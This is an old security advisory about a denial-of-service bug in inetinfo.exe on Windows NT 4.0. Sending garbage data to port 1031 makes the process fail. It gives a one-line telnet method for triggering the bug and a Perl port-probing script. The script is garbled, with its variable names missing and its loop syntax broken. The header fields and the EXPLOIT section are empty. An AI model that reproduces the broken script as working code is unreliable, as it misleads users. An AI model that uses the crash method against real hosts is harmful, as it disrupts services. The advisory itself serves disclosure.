DATE:  
COMMAND                                            SOURCE: 
                                                   AUTHOR: 
  inetinfo.exe

SYSTEMS AFFECTED

  Win NT 4.0
  

PROBLEM

    Looks like  NT is  also vulnerable  to exactly  the same attack as
    previously posted connecting and  throwing garbage at port  135 on
    another port,  namely 1031  (inetinfo).   The inetinfo.exe process
    goes insane on NT4.0.

    To try, telnet  to 1031 on  an NT machine  and type garbage,  then
    disconnect.  Credit for this goes to Bob Beck.

    Below is what Bob Beck and Chris Bayly rigged up to check.

        #!/usr/local/bin/perl

        use Socket;
        use FileHandle;


         = [0] && shift;

         = 0; # tell me what you're hitting
         = 0;  # don't hit known problem ports
  <65535; ++)
        {

          if ( && ( == 135 || == 1031)) {
               next;
          }
           = chat::open_port(, );
          chat::print (,"Windows NT is the platform of the future");
          if () {
Trying port: \n\n
          }
          chat::close();
        }



EXPLOIT

  

SOLUTION

    Not  available  at  this  momemnt.    Anyway,  see  if  You   need
    vulenarable ports.  If You don't, GREAT and disable them!